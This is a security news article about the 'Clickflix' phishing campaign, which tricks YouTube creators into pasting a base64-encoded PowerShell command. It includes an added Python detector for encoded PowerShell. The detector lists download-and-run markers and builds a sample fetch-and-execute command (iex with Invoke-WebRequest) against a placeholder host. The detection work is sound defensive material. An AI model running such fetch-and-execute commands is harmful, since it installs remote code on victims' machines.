Cyber Security News

YouTube Creators Targeted by Weaponized Brand Deals Using ‘Clickflix’ Attack Tactic

A new wave of cyberattacks is targeting YouTube creators, leveraging fake brand collaboration offers to distribute malware.

Cybersecurity firm CloudSEK has uncovered a sophisticated phishing campaign that employs the “Clickflix” technique to deceive content creators and compromise their systems.

The attack vector begins with threat actors scraping email addresses from YouTube channels using specialized parser tools.

They then utilize browser automation to send bulk phishing emails that impersonate legitimate brand collaboration proposals.

These emails contain enticing compensation structures based on subscriber count, designed to lure creators into engaging with malicious attachments.

Clickflix Technique: A New Level of Deception

The Clickflix technique represents an advanced method of malware delivery.

Mindmap of malware campaign

When victims click on a link purporting to be a payment form or wire transfer document, they are directed to a fake Microsoft Word Online page.

This page displays an error message claiming that an extension is not installed, offering “How to fix” and “Auto-fix” options.

Fake Microsoft Office website with Error in overlay

Clicking the “How to fix” button surreptitiously copies a base64-encoded PowerShell command to the user’s clipboard.

The victim follows the instructions from the overlay and copies PowerShell script by clicking on “How to Fix”

The page then instructs the target to open a PowerShell terminal and right-click, which pastes and executes the malicious code.

This social engineering tactic tricks users into unknowingly initiating the malware infection process.
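One way a defender can surface the base64-encoded PowerShell stage described above in process-creation logs, as an added example that is not from the article or the CloudSEK report. It assumes the pasted command uses PowerShell's `-EncodedCommand` parameter (or an abbreviation such as `-enc`), which the article does not state; the sample command lines and the marker list are constructed.

```python
import base64
import re

# A flag starting with "e" followed by a long base64 run, e.g. "-enc <blob>".
FLAG_RE = re.compile(r"(?i)(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/]{16,}={0,2})")
# Generic download-and-run markers; an assumption, not indicators from the report.
MARKERS = ("invoke-expression", "iex", "downloadstring", "invoke-webrequest")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline uses -EncodedCommand, else None."""
    for m in FLAG_RE.finditer(cmdline):
        flag = m.group(1).lower()
        # PowerShell accepts any prefix of -EncodedCommand, plus the alias -ec.
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy
        try:
            raw = base64.b64decode(m.group(2), validate=True)
            return raw.decode("utf-16-le")  # the parameter carries UTF-16LE text
        except ValueError:  # bad base64 or odd-length UTF-16 data
            continue
    return None


def triage(cmdline):
    """Classify one process command line: 'clean', 'encoded' or 'suspicious'."""
    low = cmdline.lower()
    if "powershell" not in low and "pwsh" not in low:
        return "clean"
    script = decode_encoded_command(cmdline)
    if script is None:
        return "clean"
    hit = any(marker in script.lower() for marker in MARKERS)
    return "suspicious" if hit else "encoded"


def _enc(script):
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample command lines (not taken from the CloudSEK report).
SAMPLES = [
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\tools\\backup.ps1",
    "powershell.exe -enc " + _enc("Get-Date | Out-File C:\\temp\\now.txt"),
    "powershell -w hidden -e " + _enc("iex (iwr 'https://example.invalid/fix.txt')"),
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "|", decode_encoded_command(line))
```

An "encoded" verdict is not malicious on its own, since administrators also use encoded commands; it marks lines worth decoding and reviewing.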

Process Tree

Once activated, the malware can steal browser data, including login credentials, cookies, and wallet information.

In some cases, it may grant remote access to the attackers, potentially leading to account takeovers and data theft.

Wide-Reaching Campaign with Global Impact

According to the report, the scope of this campaign is significant, with over 200,000 YouTube creators targeted globally.

Attackers are sending between 500 and 1,000 phishing emails from a single account, utilizing more than 340 SMTP servers to distribute their malicious messages.

The campaign primarily focuses on individuals in marketing, sales, and executive positions, as they are more likely to engage with brand collaborations and promotional offers.

This targeting strategy increases the effectiveness of the phishing attempts.

As the threat landscape evolves, content creators must remain vigilant.

Experts recommend exercising caution with unsolicited collaboration offers, especially those containing password-protected attachments.

Creators should independently verify the legitimacy of brand deals and avoid downloading attachments from unknown senders, even if they appear to be password-protected.

The Clickflix attack serves as a stark reminder of the increasingly sophisticated tactics employed by cybercriminals.

As YouTube creators continue to be lucrative targets, the importance of robust cybersecurity practices and awareness cannot be overstated.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
